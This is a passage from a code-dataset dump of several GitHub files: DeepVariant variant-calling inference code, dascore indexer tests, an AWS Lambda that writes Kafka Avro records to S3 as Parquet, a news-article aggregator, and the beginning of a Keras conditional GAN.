prediction['alt_allele_indices']\n rounded_gls = round_gls(prediction['probabilities'], precision=_GL_PRECISION)\n\n # Write it out.\n true_labels = prediction['label'] if FLAGS.debugging_true_label_mode else None\n cvo = _create_cvo_proto(\n encoded_variant,\n rounded_gls,\n encoded_alt_allele_indices,\n true_labels,\n logits=prediction.get('logits'),\n prelogits=prediction.get('prelogits'))\n return writer.write(cvo)\n\n\ndef _create_cvo_proto(encoded_variant,\n gls,\n encoded_alt_allele_indices,\n true_labels=None,\n logits=None,\n prelogits=None):\n \"\"\"Returns a CallVariantsOutput proto from the relevant input information.\"\"\"\n variant = variants_pb2.Variant.FromString(encoded_variant)\n alt_allele_indices = (\n deepvariant_pb2.CallVariantsOutput.AltAlleleIndices.FromString(\n encoded_alt_allele_indices))\n debug_info = None\n if FLAGS.include_debug_info or FLAGS.debugging_true_label_mode:\n if prelogits is not None:\n assert prelogits.shape == (1, 1, 2048)\n prelogits = prelogits[0][0]\n debug_info = deepvariant_pb2.CallVariantsOutput.DebugInfo(\n has_insertion=variant_utils.has_insertion(variant),\n has_deletion=variant_utils.has_deletion(variant),\n is_snp=variant_utils.is_snp(variant),\n predicted_label=np.argmax(gls),\n true_label=true_labels,\n logits=logits,\n prelogits=prelogits)\n call_variants_output = deepvariant_pb2.CallVariantsOutput(\n variant=variant,\n alt_allele_indices=alt_allele_indices,\n genotype_probabilities=gls,\n debug_info=debug_info)\n return call_variants_output\n\n\ndef get_shape_and_channels_from_json(example_info_json):\n \"\"\"Returns the shape and channels list from the input json.\"\"\"\n if not tf.io.gfile.exists(example_info_json):\n logging.warning(\n 'Starting from v1.4.0, we expect %s to '\n 'include information for shape and channels.', example_info_json)\n return None, None\n with tf.io.gfile.GFile(example_info_json) as f:\n example_info = json.load(f)\n example_shape = example_info['shape']\n example_channels_enum = example_info['channels']\n logging.info(\n 'From %s: '\n 'Shape of input examples: %s, '\n 'Channels of input examples: %s.', example_info_json, str(example_shape),\n str(example_channels_enum))\n return example_shape, example_channels_enum\n\n\n# TODO: Consider creating one data loading function to re-use simliar\n# code with training in train_inceptionv3.py.\ndef 
get_dataset(path, example_shape):\n \"\"\"Parse TFRecords, do image preprocessing, and return the image dataset for inference and the variant/alt-allele dataset for writing the variant calls.\"\"\"\n\n proto_features = {\n 'image/encoded': tf.io.FixedLenFeature((), tf.string),\n 'variant/encoded': tf.io.FixedLenFeature((), tf.string),\n 'alt_allele_indices/encoded': tf.io.FixedLenFeature((), tf.string)\n }\n\n def _parse_example(example):\n \"\"\"Parses a serialized tf.Example.\"\"\"\n parsed_features = tf.io.parse_single_example(\n serialized=example, features=proto_features)\n image = tf.io.decode_raw(parsed_features['image/encoded'], tf.uint8)\n image = tf.reshape(image, example_shape)\n image = tf.cast(image, tf.float32)\n image = tf.keras.applications.inception_v3.preprocess_input(image)\n variant = parsed_features['variant/encoded']\n alt_allele_indices = parsed_features['alt_allele_indices/encoded']\n return image, variant, alt_allele_indices\n\n ds = tf.data.TFRecordDataset.list_files(\n sharded_file_utils.normalize_to_sharded_file_pattern(path), shuffle=False)\n\n def load_dataset(filename):\n dataset = tf.data.TFRecordDataset(\n filename,\n buffer_size=_DEFAULT_PREFETCH_BUFFER_BYTES,\n compression_type='GZIP')\n return dataset\n\n ds = ds.interleave(\n load_dataset,\n cycle_length=_DEFAULT_INPUT_READ_THREADS,\n num_parallel_calls=tf.data.AUTOTUNE)\n if _LIMIT.value > 0:\n ds = ds.take(_LIMIT.value)\n\n image_variant_alt_allele_ds = ds.map(\n map_func=_parse_example, num_parallel_calls=tf.data.AUTOTUNE)\n\n image_variant_alt_allele_ds = image_variant_alt_allele_ds.batch(\n batch_size=FLAGS.batch_size).prefetch(tf.data.AUTOTUNE)\n return image_variant_alt_allele_ds\n\n\ndef call_variants(examples_filename: str, checkpoint_path: str,\n output_file: str):\n \"\"\"Main driver of call_variants.\"\"\"\n if FLAGS.kmp_blocktime:\n os.environ['KMP_BLOCKTIME'] = FLAGS.kmp_blocktime\n logging.vlog(3,\n 'Set KMP_BLOCKTIME to {}'.format(os.environ['KMP_BLOCKTIME']))\n\n # Read a single TFExample to make sure we're not loading an older version.\n first_example = dv_utils.get_one_example_from_examples_path(examples_filename)\n if first_example is None:\n logging.warning(\n 'Unable to read any records from %s. 
Output will contain '\n 'zero records.', examples_filename)\n tfrecord.write_tfrecords([], output_file)\n return\n\n # TODO: Check example shape and format and throw a readable\n # error if incorrect\n example_info_json = dv_utils.get_example_info_json_filename(\n examples_filename, 0)\n example_shape = get_shape_and_channels_from_json(example_info_json)[0]\n\n logging.info('Shape of input examples: %s', str(example_shape))\n\n if checkpoint_path is not None:\n model = modeling.inceptionv3(example_shape)\n model.load_weights(checkpoint_path).expect_partial()\n\n image_variant_alt_allele_ds = get_dataset(examples_filename, example_shape)\n\n with tfrecord.Writer(output_file) as writer:\n start_time = time.time()\n n_examples, n_batches = 0, 0\n for batch in image_variant_alt_allele_ds:\n predictions = model.predict_on_batch(batch[0])\n n_batches += 1\n for probabilities, variant, alt_allele_indices in zip(\n predictions, batch[1], batch[2]):\n n_examples += 1\n pred = {\n 'probabilities': probabilities,\n 'variant': variant.numpy(),\n 'alt_allele_indices': alt_allele_indices.numpy()\n }\n write_variant_call(writer, pred)\n duration = time.time() - start_time\n logging.log_every_n(\n logging.INFO,\n ('Processed %s examples in %s batches [%.3f sec per 100]'),\n _LOG_EVERY_N, n_examples, n_batches,\n (100 * duration) / n_examples)\n logging.info('Processed %s examples in %s batches [%.3f sec per 100]',\n n_examples, n_batches, (100 * duration) / n_examples)\n logging.info('Done calling variants from a total of %d examples.',\n n_examples)\n\n\ndef main(argv=()):\n with errors.clean_commandline_error_exit():\n if len(argv) > 1:\n errors.log_and_raise(\n 'Command line parsing failure: call_variants does not accept '\n 'positional arguments but some are present on the command line: '\n '\"{}\".'.format(str(argv)), errors.CommandLineError)\n del argv # Unused.\n proto_utils.uses_fast_cpp_protos_or_die()\n\n logging_level.set_from_flag()\n\n call_variants(\n examples_filename=FLAGS.examples,\n checkpoint_path=FLAGS.checkpoint,\n output_file=FLAGS.outfile)\n\n\nif __name__ == '__main__':\n flags.mark_flags_as_required([\n 'examples',\n 'outfile',\n 'checkpoint',\n ])\n app.run(main)\n","repo_name":"google/deepvariant","sub_path":"deepvariant/call_variants_keras.py","file_name":"call_variants_keras.py","file_ext":"py","file_size_in_byte":13575,"program_lang":"python","lang":"en","doc_type":"code","stars":2970,"dataset":"github-code","pt":"78"} +{"seq_id":"14844866509","text":"\"\"\"\nTests for indexing local file systems.\n\"\"\"\nimport shutil\nfrom contextlib import suppress\nfrom pathlib import Path\n\nimport pandas as pd\nimport pytest\nfrom packaging.version import parse as get_version\n\nimport dascore as dc\nfrom dascore.io.indexer import DirectoryIndexer\nfrom dascore.utils.patch import get_default_patch_name\n\n\n@pytest.fixture(scope=\"class\")\ndef basic_indexer(two_patch_directory):\n \"\"\"Return and indexer on the basic spool directory.\"\"\"\n return DirectoryIndexer(two_patch_directory)\n\n\n@pytest.fixture(scope=\"class\")\ndef adjacent_indexer(adjacent_spool_directory):\n \"\"\"Return and indexer on the basic spool directory.\"\"\"\n return DirectoryIndexer(adjacent_spool_directory).update()\n\n\n@pytest.fixture(scope=\"class\")\ndef diverse_indexer(diverse_spool_directory):\n \"\"\"Return and indexer on the basic spool directory.\"\"\"\n return DirectoryIndexer(diverse_spool_directory).update()\n\n\n@pytest.fixture(scope=\"class\")\ndef diverse_df(diverse_indexer):\n \"\"\"Return 
the contents of the diverse indexer\"\"\"\n return diverse_indexer()\n\n\n@pytest.fixture()\ndef diverse_df_reset_cache(diverse_indexer):\n \"\"\"Return the indexer with a reset cache\"\"\"\n return DirectoryIndexer(diverse_indexer.path)\n\n\n@pytest.fixture(params=[diverse_indexer, diverse_df_reset_cache])\ndef diverse_ind(request):\n \"\"\"Aggregate the diverse indexers\"\"\"\n return request.getfixturevalue(request.param.__name__)\n\n\n@pytest.fixture()\ndef empty_index(tmp_path_factory):\n \"\"\"Create an index around an empty directory.\"\"\"\n path = tmp_path_factory.mktemp(\"index_created_test\")\n return DirectoryIndexer(path).update()\n\n\nclass TestBasics:\n \"\"\"Basic tests for indexer\"\"\"\n\n def test_str_repr(self, basic_indexer):\n \"\"\"Ensure a useful (not the default) str/repr is implemented\"\"\"\n out = str(basic_indexer)\n assert \"object at\" not in out\n\n def test_version(self, basic_indexer):\n \"\"\"Ensure the version written to file is correct.\"\"\"\n updated = basic_indexer.update()\n index_version = updated._index_table._index_version\n assert index_version == dc.__last_version__\n assert get_version(index_version) > get_version(\"0.0.1\")\n\n\nclass TestGetContents:\n \"\"\"Test cases for getting contents of indexer as dataframes.\"\"\"\n\n def test_get_contents(self, basic_indexer, two_patch_directory):\n \"\"\"Ensure contents are returned.\"\"\"\n out = basic_indexer()\n files = list(Path(two_patch_directory).rglob(\"*.hdf5\"))\n assert isinstance(out, pd.DataFrame)\n assert len(out) == len(files)\n names_df = {x.split(\"/\")[-1] for x in out[\"path\"]}\n names_files = {x.name for x in files}\n assert names_df == names_files\n\n def test_filter_large_starttime(self, diverse_df, diverse_ind):\n \"\"\"Ensure the index can be filtered by end time.\"\"\"\n max_starttime = diverse_df[\"time_min\"].max()\n filtered = diverse_df[diverse_df[\"time_min\"] >= max_starttime]\n out = diverse_ind(time_min=max_starttime)\n assert len(out) == len(filtered)\n\n def test_filter_small_starttime(self, diverse_df, diverse_ind):\n \"\"\"Ensure the index can be filtered by start time.\"\"\"\n min_endtime = diverse_df[\"time_max\"].min()\n filtered = diverse_df[diverse_df[\"time_max\"] <= min_endtime]\n out = diverse_ind(time_max=min_endtime)\n assert len(out) == len(filtered)\n\n def test_filter_station_exact(self, diverse_df, diverse_ind):\n \"\"\"Ensure contents can be filtered on time.\"\"\"\n # tests for filtering with exact station name\n exact_name = diverse_df[\"station\"].unique()[0]\n new_df = diverse_ind(station=exact_name)\n assert (new_df[\"station\"] == exact_name).all()\n\n def test_filter_isin(self, diverse_df, diverse_ind):\n \"\"\"Ensure contents can be filtered on time.\"\"\"\n # tests for filtering with exact station name\n exact_name = diverse_df[\"station\"].unique()[0]\n new_df = diverse_ind(station=exact_name)\n assert (new_df[\"station\"] == exact_name).all()\n\n def test_emtpy_index(self, empty_index):\n \"\"\"An empty index should return an empty dataframe.\"\"\"\n df = empty_index()\n assert df.empty\n\n\nclass TestUpdate:\n \"\"\"Tests for updating index.\"\"\"\n\n @pytest.fixture(scope=\"class\")\n def spool_directory_with_non_das_file(self, two_patch_directory, tmp_path_factory):\n \"\"\"Create a directory with some das files and some non-das files.\"\"\"\n new = tmp_path_factory.mktemp(\"unreadable_test\") / \"sub\"\n shutil.copytree(two_patch_directory, new)\n indexer = DirectoryIndexer(new)\n # remove index if it exists\n with 
suppress(FileNotFoundError):\n indexer.index_path.unlink()\n # add a non das file\n with open(new / \"not_das.open\", \"w\") as fi:\n fi.write(\"cant be das, can it?\")\n return new\n\n def test_add_one_patch(self, empty_index, random_patch):\n \"\"\"Ensure a new patch added to the directory shows up.\"\"\"\n path = empty_index.path / get_default_patch_name(random_patch)\n random_patch.io.write(path, file_format=\"dasdae\")\n new_index = empty_index.update()\n contents = new_index()\n assert len(contents) == 1\n\n def test_index_with_bad_file(self, spool_directory_with_non_das_file):\n \"\"\"Ensure if one file is not readable index continues.\"\"\"\n indexer = DirectoryIndexer(spool_directory_with_non_das_file)\n # if this doesn't fail the test passes\n updated = indexer.update()\n assert isinstance(updated, DirectoryIndexer)\n","repo_name":"d-chambers/dascore","sub_path":"tests/test_io/test_indexer.py","file_name":"test_indexer.py","file_ext":"py","file_size_in_byte":5609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27665909610","text":"import os\nimport json\nimport boto3\nimport logging\nimport base64\nimport requests\nfrom pprint import pprint\nfrom datetime import datetime\n\nimport pandas as pd\nimport awswrangler as wr\n\nimport avro.schema\nfrom avro.io import DatumReader, BinaryDecoder\n\nfrom confluent_kafka.avro import AvroConsumer\nfrom confluent_kafka.serialization import SerializationContext, MessageField\nfrom confluent_kafka.serialization import IntegerDeserializer, StringDeserializer\nfrom confluent_kafka.schema_registry.avro import AvroDeserializer # for Kafka value\nfrom confluent_kafka.avro.serializer import SerializerError\nfrom confluent_kafka.schema_registry import SchemaRegistryClient, RegisteredSchema\nfrom confluent_kafka.schema_registry.error import SchemaRegistryError\n\n\nlogger = logging.getLogger()\nif logger.handlers:\n for handler in logger.handlers:\n logger.removeHandler(handler)\nlogging.basicConfig(format='%(asctime)s %(message)s', level=logging.INFO)\n\nENV_TOPIC:str = os.getenv('INPUT_TOPIC')\nif ENV_TOPIC:\n logger.info(f'Found ENV Variable \"INPUT_TOPIC\". Value={ENV_TOPIC}')\nelse:\n raise Exception('Could not fined ENV Variable \"INPUT_TOPIC\".')\n \nENV_BASE_FOLDER:str = os.getenv('BASE_FOLDER')\nif ENV_BASE_FOLDER:\n logger.info(f'Found ENV Variable \"BASE_FOLDER\". 
Value={ENV_BASE_FOLDER}')\nelse:\n raise Exception('Could not fined ENV Variable \"BASE_FOLDER\".')\n\nTEST_S3_BUCKET:str='lineardp-conformance-common-flink-dev'\n\nTEST_SCHEMA_NAME:str=ENV_TOPIC # 'lndcdcadsprpsl_flightrange'\nTEST_S3_FOLDER:str=ENV_BASE_FOLDER # 'lambda_datasync_10k'\n\n# KMS_KEY_ARN:str='arn:aws:kms:us-east-1:550060283415:key/1c9916d5-8214-4a84-b4ed-ae5570e2ea43' # lineardp-credential-kms-dev\nKMS_KEY_ARN:str='arn:aws:kms:us-east-1:550060283415:key/2bb9d33c-8b5b-4f67-bccc-6d9f603d7609' # lineardp-conformed-kms-dev\n\nKEY_SERIALIZATION_CTX:SerializationContext = SerializationContext(topic=TEST_SCHEMA_NAME, field=MessageField.KEY)\nVALUE_SERIALIZATION_CTX:SerializationContext = SerializationContext(topic=TEST_SCHEMA_NAME, field=MessageField.VALUE)\n\nAVRO_SCHEMA_REGISTRY_BASE_URL:str='http://dev-cdp-schema-registry-pvt.us-east-1.espndev.pvt'\nSCHEMA_REGISTRY_CONF:dict={\"url\": AVRO_SCHEMA_REGISTRY_BASE_URL}\nAVRO_SCHEMA_REGISTRY_CLIENT:SchemaRegistryClient = SchemaRegistryClient(conf=SCHEMA_REGISTRY_CONF)\n\nUTF_8_DESERIALIZER:StringDeserializer = StringDeserializer('utf_8')\nINT_DESERIALIZER:IntegerDeserializer = IntegerDeserializer()\n\nVALUE_SCHEMA:str = None\n\ndef write_parquet_to_s3(topic:str, dataset:dict, column_names:list, bucket_name:str, base_folder:str) -> tuple:\n now_utc:datetime = datetime.utcnow()\n epoch = now_utc.timestamp()\n \n first_key = next(iter(dataset))\n first_value:list = dataset[first_key]\n total_records_count:int = len(first_value)\n \n distinct_src_key_val:set = set(dataset['SRC_KEY_VAL'])\n distinct_records_count:int = len(distinct_src_key_val)\n\n filename:str = f'{topic}_{epoch}_{total_records_count}_{distinct_records_count}.parquet'\n \n # yyyy/MM/dd\n partition_path:str = f'{now_utc.year}/{now_utc.month:02}/{now_utc.day:02}'\n s3_object_path:str = f'{base_folder}/{topic}/{partition_path}/{filename}'\n logger.info('Using S3 Bucket %s, S3 key: %s', bucket_name, s3_object_path)\n \n s3_uri:str = f's3://{bucket_name}/{s3_object_path}'\n logger.info('S3 URI: %s', s3_uri)\n \n try:\n df = pd.DataFrame(dataset, columns=column_names)\n wr.s3.to_parquet(df, s3_uri)\n return (s3_uri, total_records_count, distinct_records_count)\n except Exception as ex:\n logger.error(ex)\n return (None, None)\n\n\ndef get_AVRO_schema(base_schema_name:str) -> str:\n global VALUE_SCHEMA\n if None == VALUE_SCHEMA:\n value_schema_name:str = f'{base_schema_name}-value'\n schema_text:str = None\n \n # Method 1\n # schema_registry_url = f'{AVRO_SCHEMA_REGISTRY_BASE_URL}/subjects/{value_schema_name}/versions/latest'\n # logger.info('SCHEMA REGISTRY=%s', schema_registry_url)\n # response = requests.get(schema_registry_url)\n # if (response):\n # # pprint(dir(response))\n # logger.info('GET response code: %s', response.status_code)\n # schema_text = response.text\n # else:\n # logger.error('Unable to reach schema registry: %s', schema_registry_url)\n \n # Method 2\n # all_schemas = AVRO_SCHEMA_REGISTRY_CLIENT.get_subjects()\n # for schema in all_schemas:\n # logger.info('SCHEMA: %s', schema)\n try:\n found_schema:RegisteredSchema = AVRO_SCHEMA_REGISTRY_CLIENT.get_latest_version(subject_name=value_schema_name)\n logger.info('Found schema: %s', found_schema)\n VALUE_SCHEMA = found_schema.schema.schema_str\n except SchemaRegistryError as schema_reg_err:\n logger.error('ERROR %s', schema_reg_err)\n else:\n pass\n\n return VALUE_SCHEMA\n\ndef decode_key(encoded_key:str):\n decoded_key_bytes:bytes = base64.b64decode(encoded_key)\n # logger.debug('Encoded Key: %s', 
encoded_key)\n    # logger.debug('Decoded Key: %s', decoded_key_bytes)\n    \n    try:\n        logger.debug('1. Trying with String Deserializer')\n        return UTF_8_DESERIALIZER(decoded_key_bytes, ctx=KEY_SERIALIZATION_CTX)\n    except Exception as e1:\n        logger.error('ERROR %s', e1)\n        try:\n            logger.debug('2. Trying with Integer Deserializer')\n            return INT_DESERIALIZER(decoded_key_bytes, ctx=KEY_SERIALIZATION_CTX)\n        except Exception as e2:\n            logger.error('ERROR %s', e2)\n            logger.debug('3. Trying with simple ASCII decode')\n            return decoded_key_bytes.decode('ascii')\n    \ndef decode_avro(schema:str, encoded_value:str) -> dict:\n    decoded_value_bytes:bytes = base64.b64decode(encoded_value)\n    # logger.debug('Encoded Value: %s', encoded_value)\n    # logger.debug('Decoded Value: %s', decoded_value_bytes)\n\n    schema_text:str = get_AVRO_schema(base_schema_name=schema)\n\n    try:\n        value_deserializer = AvroDeserializer(schema_str=schema_text, schema_registry_client=AVRO_SCHEMA_REGISTRY_CLIENT)\n        return_values = value_deserializer(decoded_value_bytes, ctx=VALUE_SERIALIZATION_CTX)\n        return return_values\n    except Exception as ex:\n        logger.error(\"ERROR while decoding AVRO\")\n        logger.error(ex)\n        # fall back to plain avro decoding; the raw bytes must be wrapped in a file-like buffer first\n        import io\n        value_buffer = io.BytesIO(decoded_value_bytes)\n        value_buffer.seek(5)  # skip the Confluent wire-format magic byte and 4-byte schema id\n        binary_decoder = BinaryDecoder(value_buffer)\n        avro_schema = avro.schema.Parse(schema_text)\n        avro_reader = DatumReader(avro_schema)\n        return avro_reader.read(binary_decoder)\n\ndef lambda_handler(event, context):\n    logger.info('Context: %s', context)\n\n    logger.info('Event: %s', event)\n    event_records = event['records']\n    logger.info('Total records %d', len(event_records))\n    \n    avro_records:list = []\n    \n    fields_names:list = []\n    datatypes_list:list = []\n    dataset:dict = {}\n    \n    metadata_avail:bool = False\n\n    for kafka_partition in event_records:\n        logger.info('---')\n        kafka_records = event['records'][kafka_partition]\n        records_cnt:int = len(kafka_records)\n        logger.info('Total %d records for partition: %s', records_cnt, kafka_partition)\n        for krecord in kafka_records:\n            krecord_key:str = krecord['key']\n            decrypted_key = decode_key(encoded_key=krecord_key)\n\n            krecord_val:str = krecord['value']\n            # decrypted_val_bytes = base64.b64decode(krecord_val)\n            decrypted_val = decode_avro(schema=TEST_SCHEMA_NAME, encoded_value=krecord_val)\n\n            # logger.info('Orig Key=%s & Orig Value=%s', krecord_key, krecord_val)\n            logger.info('%s===%s', decrypted_key, decrypted_val)\n            \n            if (not metadata_avail):\n                for column_name in decrypted_val:\n                    fields_names.append(column_name)\n                    dataset[column_name] = []\n                metadata_avail = True\n            \n            if (metadata_avail):\n                for column_name in decrypted_val:\n                    existing_data_list:list = dataset[column_name]\n                    new_entry = decrypted_val[column_name]\n                    existing_data_list.append(new_entry)\n                    dataset[column_name] = existing_data_list\n    \n    return_json:str = json.dumps(dataset)\n    # np_arr = np.asarray(dataset)\n    # pprint(np_arr)\n    \n    return_tuple = write_parquet_to_s3(topic=TEST_SCHEMA_NAME, \\\n                        dataset=dataset, column_names=fields_names, \\\n                        bucket_name=TEST_S3_BUCKET, base_folder=TEST_S3_FOLDER)\n\n    parquet_file_on_s3:str = return_tuple[0]\n\n    if (parquet_file_on_s3):\n        total_cnt:int = return_tuple[1]\n        distinct_cnt:int = return_tuple[2]\n        return_dict:dict = {\"s3_file\": parquet_file_on_s3, \"total_records\": total_cnt, \"distinct_records\": distinct_cnt}\n        return {\n            'statusCode': 200,\n            'body': return_dict\n        }\n    else:\n        return {\n            'statusCode': 500,\n            'body': f'Error converting to parquet or upload to S3: {TEST_S3_BUCKET}'\n        
}","repo_name":"productiveAnalytics/lambda_Kafka_to_S3_parquet","sub_path":"lambda_function_with_AWS_datawrangler.py","file_name":"lambda_function_with_AWS_datawrangler.py","file_ext":"py","file_size_in_byte":9124,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"35706133929","text":"\"\"\"\nModule intended to be run to aggregate news items into a \npickled dataframe to be used in analysis of news.\nDoes some cleaning, separates text, source, date, author.\n\"\"\"\nimport os\nimport re\nimport argparse\nimport pandas\nfrom bs4 import BeautifulSoup\n\nparser = argparse.ArgumentParser(description='News item aggregator into a pickled dataframe')\nparser.add_argument('--output', type=str, default='news_df.pkl',\n help='Name of the file for the pickled dataframe output')\nargs = parser.parse_args()\n\ndef extract_news(html, country):\n \"\"\"\n Cleans and separates elements of an article.\n args:\n html: html text from news article file\n country: country code from file\n output:\n A dictionary with the text, title, authors, date of the news article file.\n \"\"\"\n article_dict = {'filename': html.name, 'country': country}\n soup = BeautifulSoup(html, 'lxml')\n \n # title\n title0 = soup.find_all('div', {'class' : 'title'})\n # cleaning\n title1 = title0[0].text.replace('Hide Details', '')\n title = re.sub(r'\\<.*\\>', '', title1)\n article_dict['title'] = title\n\n # text\n body = soup.find_all('div', {'class' : 'body'})\n text0 = body[0].text.replace('\\n', ' ')\n \n # take out first word if all caps (it is a location)\n text1 = re.sub(r\"^([A-Z]{2,}\\s?[A-Z]{2,})\", \"\", text0)\n # take out from end\n text1 = re.sub(r'©.*$', '', text1)\n text2 = re.sub(r\"\\S*@\\S*\\s?\", \"ZXCVB\", text1) #email\n text3 = re.sub(r\"ZXCVB(.*)|Published by HT (.*)|Caption (.*)|Copyright\\s\\((.*)|Copyright: (.*)|Source- (.*)|Digital Content Services (.*)|Syndication with permission (.*)|www(.*)|http(.*)\", \"\", text2)\n # take out from middle \n text4 = re.sub(r\"(STORY CAN END HERE)\", \"\", text3)\n text5 = re.sub(r\"(EDITORS: STORY CAN END HERE)\", \"\", text4)\n text = re.sub(r\"(EDITORS: )\", \"\", text5)\n\n # take out all dots that are within parentheses (semantic parser dislikes that)\n def dots_in_parentheses(match):\n return re.sub(r'\\.', r';', match.group())\n parens = re.compile(r'(?<=\\()[^\\)]*?\\..[^\\(]*?(?=\\))')\n text = parens.sub(dots_in_parentheses, text)\n text = re.sub(r'\\.\"', '\".', text)\n article_dict['text'] = text\n\n # source & date\n source = soup.find_all('div', {'class' : 'source'})\n date = re.findall(r'(?:January|February|March|April|May|June|July|August|September|October|November|December)\\s\\d{1,2},\\s\\d{4}', source[0].text)\n article_dict['date'] = date[0]\n pat2 = re.compile(r\"(.*?)-\\s\", re.M)\n newssource = pat2.findall(source[0].text)\n article_dict['source'] = newssource[0]\n\n # author\n author0 = soup.find_all('span', {'class' : 'val'})\n author = re.sub(r'\\<.*\\>', '', author0[0].text) #Take out <>\n article_dict['author'] = author\n\n # section\n section0 = soup.find_all('span', {'class' : 'lbl'}, string=\"Section: \")\n try:\n section = section0[0].next_element.next_element.next_element.text\n article_dict['section'] = section\n except:\n article_dict['section'] = ''\n \n return article_dict\n\ndef aggregate_news_files():\n \"\"\"\n Runs through the news article data files, extracts the news and \n aggregates them into a pandas dataframe\n \"\"\"\n indir = './data/'\n article_list = []\n for 
root, _, filenames in os.walk(indir):\n        for newsfile in filenames:\n            filepath = os.path.join(root, newsfile)\n            with open(filepath, 'r', encoding='utf-8') as testfile:\n                try:\n                    article_dict = extract_news(testfile, newsfile[:2])\n                    article_list.append(article_dict)\n                except:\n                    print(filepath)\n                    raise\n    return pandas.DataFrame(article_list)\n\ndf = aggregate_news_files()\n\n\n# Take out duplicates\ndups = pandas.read_pickle('to_delete_index.pkl')\nnews_sorted = df.sort_values(by=['country','title'])\nnews_sorted.reset_index(inplace=True)\nnews_sorted.drop(['index'], axis=1, inplace=True)\ndf = news_sorted.loc[~news_sorted.index.isin(dups)] \n\n\ndf.to_pickle(args.output)\n\n","repo_name":"Moloq/climate-news-analyst","sub_path":"news_aggregator.py","file_name":"news_aggregator.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"}{"seq_id":"35518073469","text":"# -*- coding: utf-8 -*-\r\n# @Time    : 2019/10/8 13:39\r\n# @Author  : Dai PuWei\r\n# @File    : CGAN.py\r\n# @Software: PyCharm\r\n\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom scipy.stats import truncnorm\r\n\r\n\r\nfrom keras import Input\r\nfrom keras import Model\r\nfrom keras import Sequential\r\n\r\nfrom keras.layers import Dense\r\nfrom keras.layers import Activation\r\nfrom keras.layers import Reshape\r\nfrom keras.layers import Conv2DTranspose\r\nfrom keras.layers import BatchNormalization\r\nfrom keras.layers import Conv2D\r\nfrom keras.layers import LeakyReLU\r\nfrom keras.layers import Dropout\r\nfrom keras.layers import Flatten\r\nfrom keras.layers.merge import multiply\r\nfrom keras.layers.merge import concatenate\r\nfrom keras.layers.merge import add\r\nfrom keras.layers import Embedding\r\nfrom keras.utils import to_categorical\r\nfrom keras.optimizers import Adam\r\nfrom keras.utils.generic_utils import Progbar\r\nfrom copy import deepcopy\r\nfrom keras.datasets import mnist\r\n\r\ndef make_trainable(net, val):\r\n    \"\"\" Freeze or unfreeze layers\r\n    \"\"\"\r\n    net.trainable = val\r\n    for l in net.layers: l.trainable = val\r\n\r\nclass CGAN(object):\r\n\r\n    def __init__(self,config,weight_path=None):\r\n        \"\"\"\r\n        CGAN initializer.\r\n        :param config: configuration object instance\r\n        :param weight_path: path to a weights file, defaults to None\r\n        \"\"\"\r\n        self.config = config\r\n        self.build_cgan_model()\r\n\r\n        if weight_path is not None:\r\n            self.cgan.load_weights(weight_path,by_name=True)\r\n\r\n    def build_cgan_model(self):\r\n        \"\"\"\r\n        Build the full CGAN model.\r\n        :return:\r\n        \"\"\"\r\n        # initialise the inputs\r\n        self.generator_noise_input = Input(shape=(self.config.generator_noise_input_dim,))\r\n        self.condational_label_input = Input(shape=(1,), dtype='int32')\r\n        self.discriminator_image_input = Input(shape=self.config.discriminator_image_input_dim)\r\n\r\n        # define the optimizer\r\n        self.optimizer = Adam(lr=2e-4, beta_1=0.5)\r\n\r\n        # build the generator and discriminator models\r\n        self.discriminator_model = self.build_discriminator_model()\r\n        self.discriminator_model.compile(optimizer=self.optimizer, loss=['binary_crossentropy'],metrics=['accuracy'])\r\n        self.generator_model = self.build_generator()\r\n\r\n        # build the combined CGAN model\r\n        self.discriminator_model.trainable = False\r\n        self.cgan_input = [self.generator_noise_input,self.condational_label_input]\r\n        generator_output = self.generator_model(self.cgan_input)\r\n        cgan_output = self.discriminator_model([generator_output,self.condational_label_input])\r\n        self.cgan = Model(self.cgan_input,cgan_output)\r\n\r\n        # compile\r\n
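        # (the discriminator already has its own compiled training graph above; its weights stay frozen inside the combined model)\r\n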
        #self.discriminator_model.compile(optimizer=self.optimizer,loss='binary_crossentropy')\r\n        self.cgan.compile(optimizer=self.optimizer,loss=['binary_crossentropy'])\r\n\r\n    def build_discriminator_model(self):\r\n        \"\"\"\r\n        Build the discriminator model.\r\n        :return:\r\n        \"\"\"\r\n        model = Sequential()\r\n\r\n        model.add(Dense(512, input_dim=np.prod(self.config.discriminator_image_input_dim)))\r\n        model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n        model.add(Dense(512))\r\n        model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n        model.add(Dropout(self.config.LeakyReLU_alpha))\r\n        model.add(Dense(512))\r\n        model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n        model.add(Dropout(self.config.LeakyReLU_alpha))\r\n        model.add(Dense(1, activation='sigmoid'))\r\n        model.summary()\r\n\r\n        img = Input(shape=self.config.discriminator_image_input_dim)\r\n        label = Input(shape=(1,), dtype='int32')\r\n\r\n        label_embedding = Flatten()(Embedding(self.config.condational_label_num,\r\n                                              np.prod(self.config.discriminator_image_input_dim))(label))\r\n        flat_img = Flatten()(img)\r\n        model_input = multiply([flat_img, label_embedding])\r\n        validity = model(model_input)\r\n\r\n        return Model([img, label], validity)\r\n\r\n\r\n    def build_generator(self):\r\n        \"\"\"\r\n        Build the generator network.\r\n        :return: the generator model\r\n        \"\"\"\r\n        model = Sequential()\r\n\r\n        model.add(Dense(256, input_dim=self.config.generator_noise_input_dim))\r\n        model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n        model.add(BatchNormalization(momentum=self.config.batchnormalization_momentum))\r\n        model.add(Dense(512))\r\n        model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n        model.add(BatchNormalization(momentum=self.config.batchnormalization_momentum))\r\n        model.add(Dense(1024))\r\n        model.add(LeakyReLU(alpha=self.config.LeakyReLU_alpha))\r\n        model.add(BatchNormalization(momentum=self.config.batchnormalization_momentum))\r\n        model.add(Dense(np.prod(self.config.discriminator_image_input_dim), activation='tanh'))\r\n        model.add(Reshape(self.config.discriminator_image_input_dim))\r\n\r\n        model.summary()\r\n\r\n        noise = 